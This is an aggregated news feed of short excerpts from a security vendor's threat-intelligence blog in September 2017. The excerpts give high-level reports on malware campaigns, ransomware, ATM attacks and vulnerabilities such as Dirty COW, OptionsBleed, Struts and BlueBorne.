Malware and AntiVirus News

TrendLabs Security Intelligence Blog

Threat News and Information Direct from the Experts

Business Process Compromise and the Underground’s Economy of Coupon Fraud Thursday, 28 September 2017, 12:03 pm

The fraudulent redemption of freebies, discounts, and rebates in the form of coupons is reportedly costing U.S. businesses $300–600 million every year. And where there’s money to be made, there are cybercriminals rustling up schemes to take advantage of it. Unsurprisingly, that was the case when it comes to coupon fraud, which we found to be rife and thriving in the underground.

What does coupon fraud mean for businesses? In 2012, major manufacturers were victimized by counterfeit coupons, with one consumer goods corporation pegging its losses to around $1.28 million. Another coupon fraud scheme almost a decade in the making stole at least $250 million from companies.

Post from: Trendlabs Security Intelligence Blog – by Trend Micro

Business Process Compromise and the Underground’s Economy of Coupon Fraud

Source: TrendLabs Security Intelligence Blog TrendLabs Security Intelligence Blog | Trend Micro Deep Security Labs

An Elaborate ATM Threat Crops Up: Network-based ATM Malware Attacks Tuesday, 26 September 2017, 12:00 pm

Infecting automated teller machines (ATMs) with malware is nothing new. It’s concerning, yes. But new? Not really. We’ve been seeing physical attacks against ATMs since 2009. By physical, we mean opening the target machine’s casing, accessing the motherboard and connecting USB drives or CD-ROMs in order to infect the operating system. Once infected, the ATM is at the attackers’ mercy, which normally means that they are able to empty the money cassettes and walk away with fully loaded wallets. In 2016, we released a joint paper with Europol’s European Cybercrime Centre (EC3) that discussed the shift from physical to digital means of emptying an ATM and described the different ATM malware families that had been seen in the wild by then.

What has happened since? On top of many more malware families entering the landscape – something that was expected in these cases – there is one new development we forecast that unfortunately has come to pass: Attackers have started infecting ATMs with malware through the network. Five distinct incidents of network-based ATM malware attacks have already been reported in the media, and we believe this to be significant because it shows how cybercriminals have had ATMs firmly in their crosshairs.

Post from: Trendlabs Security Intelligence Blog – by Trend Micro

An Elaborate ATM Threat Crops Up: Network-based ATM Malware Attacks

Source: TrendLabs Security Intelligence Blog TrendLabs Security Intelligence Blog | Trend Micro Forward-Looking Threat Research Team

ZNIU: First Android Malware to Exploit Dirty COW Vulnerability Monday, 25 September 2017, 12:00 pm

The Linux vulnerability called Dirty COW (CVE-2016-5195) was first disclosed to the public in 2016. The vulnerability was discovered in upstream Linux platforms such as Redhat, and Android, which kernel is based on Linux. It is categorized as a serious privilege escalation flaw that allows an attacker to gain root access on the targeted system. Dirty COW attacks on Android has been silent since its discovery, perhaps because it took attackers some time to build a stable exploit for major devices. Almost a year later, Trend Micro researchers captured samples of ZNIU (detected as AndroidOS_ZNIU)—the first malware family to exploit the vulnerability on the Android platform.

Post from: Trendlabs Security Intelligence Blog – by Trend Micro

ZNIU: First Android Malware to Exploit Dirty COW Vulnerability

Source: TrendLabs Security Intelligence Blog TrendLabs Security Intelligence Blog | Mobile Threat Response Team

EITest Campaign Uses Tech Support Scams to Deliver Coinhive’s Monero Miner Friday, 22 September 2017, 4:01 pm

We’ve uncovered the notorious EITest campaign delivering a JavaScript (JS) cryptocurrency miner (detected by Trend Micro as HKTL_COINMINE) using tech support scams as a social engineering lure. These are fraud activities impersonating legitimate technical support services, conning unwitting victims to avail/pay for these services (or hand out financial data), by scaring them that their machine has been infected with malware, for instance.

The EITest campaign’s main arsenal is compromised websites. Its activity can be traced to as early as 2014 and once used the Angler exploit kit to deliver ransomware. Starting January 2017, it has eschewed exploit kits in favor of “HoeflerText” (a popular font) phishing attacks or  . In a month, we identified 990 compromised websites injected with a malicious script that diverts the would-be victim to a website related to the tech support scam. Of late, though, the campaign has added the Coinhive JS miner into ongoing attacks, turning the victim’s computer into a Monero cryptocurrency miner. Analysis also revealed that this JS cryptocurrency miner is the same “Coinhive” JS miner found embedded in The Pirate Bay’s website.

Post from: Trendlabs Security Intelligence Blog – by Trend Micro

EITest Campaign Uses Tech Support Scams to Deliver Coinhive’s Monero Miner

Source: TrendLabs Security Intelligence Blog TrendLabs Security Intelligence Blog | Joseph C Chen (Fraud Researcher)

OptionsBleed – The Apache HTTP Server Now Bleeds Friday, 22 September 2017, 11:04 am

A new vulnerability in the Apache HTTP server was found recently. Designated as CVE-2017-9798, this vulnerability lies in how Apache handles certain settings in its configuration files, resulting in memory leaks. This vulnerability is named OptionsBleed, based on its similarities with the Heartbleed vulnerability. Patches to Apache are now available.

Post from: Trendlabs Security Intelligence Blog – by Trend Micro

OptionsBleed – The Apache HTTP Server Now Bleeds

Source: TrendLabs Security Intelligence Blog TrendLabs Security Intelligence Blog | Trend Micro Deep Security Labs

a-PATCH-e: Struts Vulnerabilities Run Rampant Thursday, 21 September 2017, 4:01 pm

Equifax confirmed the attack vector used in its data breach to be CVE-2017-5638, a vulnerability patched last March 2017 via S2-045. The vulnerability was exploited to gain unauthorized access to highly sensitive data of approximately 143 million U.S. and 400,000 U.K. customers, as well as 100,000 Canadian consumers. This vulnerability was first disclosed in March, almost immediately followed by publicly available POCs, weaponized exploits, and scanners produced by third parties.

Trend Micro observed thousands of filter events via our intrusion prevention solutions against the filters for this vulnerability since March, and these exploits or enumeration attempts are still being seen. It’s worth noting that Trend Micro customers can leverage these filters to provide a highly effective virtual patch to address critical Apache Struts vulnerabilities until actual software updates are deployed to secure the system.

Post from: Trendlabs Security Intelligence Blog – by Trend Micro

a-PATCH-e: Struts Vulnerabilities Run Rampant

Source: TrendLabs Security Intelligence Blog TrendLabs Security Intelligence Blog | Trend Micro

New RETADUP Variants Hit South America, Turn To Cryptocurrency Mining Wednesday, 20 September 2017, 2:43 pm

Several months ago, we discovered and exposed RETADUP malware in Israeli hospitals. We also learned that an Android malware known as “GhostCtrl” was stored in their infrastructure, which might be used for cyberespionage or cybercrime.

Post from: Trendlabs Security Intelligence Blog – by Trend Micro

New RETADUP Variants Hit South America, Turn To Cryptocurrency Mining

Source: TrendLabs Security Intelligence Blog TrendLabs Security Intelligence Blog | Trend Micro Cyber Safety Solutions Team

Locky Ransomware Pushed Alongside FakeGlobe in Upgraded Spam Campaigns Monday, 18 September 2017, 4:00 pm

In the beginning of September, a sizeable spam campaign was detected distributing a new Locky variant. Locky is a notorious ransomware that was first detected in the early months of 2016 and has continued to evolve and spread through different methods, particularly spam mail. A thorough look at samples from recent campaigns shows that cybercriminals are using sophisticated distribution methods, affecting users in more than 70 countries.

In the specific campaigns discussed below, both Locky and the ransomware FakeGlobe were being distributed—but the two were rotated. The cybercriminals behind the campaign designed it so that clicking on a link from the spam email might deliver Locky one hour, and then FakeGlobe the next. This makes re-infection a distinct possibility, as victims infected with one ransomware are still vulnerable to the next one in the rotation.

Post from: Trendlabs Security Intelligence Blog – by Trend Micro

Locky Ransomware Pushed Alongside FakeGlobe in Upgraded Spam Campaigns

Source: TrendLabs Security Intelligence Blog TrendLabs Security Intelligence Blog | Trend Micro

iXintpwn/YJSNPI Abuses iOS’s Config Profile, can Crash Devices Monday, 18 September 2017, 10:05 am

While iOS devices generally see relatively fewer threats because of the platform’s walled garden approach in terms of how apps are installed, it’s not entirely unbreachable. We saw a number of threats that successfully scaled the walls in 2016, from those that abused enterprise certificates to ones that exploited vulnerabilities to curtail Apple’s stringent control over its platforms.

This is further exemplified by iXintpwn/YJSNPI (detected by Trend Micro as TROJ_YJSNPI.A), a malicious profile that can render the iOS device unresponsive. It was part of the remnants of the work of a Japanese script kiddie who was arrested in early June this year.

While iXintpwn/YJSNPI seems currently concentrated in Japan, it won’t surprise anyone if it spreads beyond the country given how it proliferated in social media.

Post from: Trendlabs Security Intelligence Blog – by Trend Micro

iXintpwn/YJSNPI Abuses iOS’s Config Profile, can Crash Devices

Source: TrendLabs Security Intelligence Blog TrendLabs Security Intelligence Blog | Trend Micro

Advisory: BlueBorne Reportedly Affects Billions of Bluetooth-Enabled Devices Friday, 15 September 2017, 1:00 pm

BlueBorne is a set of vulnerabilities affecting the implementation of Bluetooth in iOS, Android, Linux, Windows and Mac OS* devices. According to the researchers who uncovered them, BlueBorne affects around 5.3 billion Bluetooth-enabled devices. The immediate mitigation for BlueBorne is to patch the device, if there’s any available, or to switch off the device’s Bluetooth connection if not needed.

Post from: Trendlabs Security Intelligence Blog – by Trend Micro

Advisory: BlueBorne Reportedly Affects Billions of Bluetooth-Enabled Devices

Source: TrendLabs Security Intelligence Blog TrendLabs Security Intelligence Blog | Trend Micro Cyber Safety Solutions Team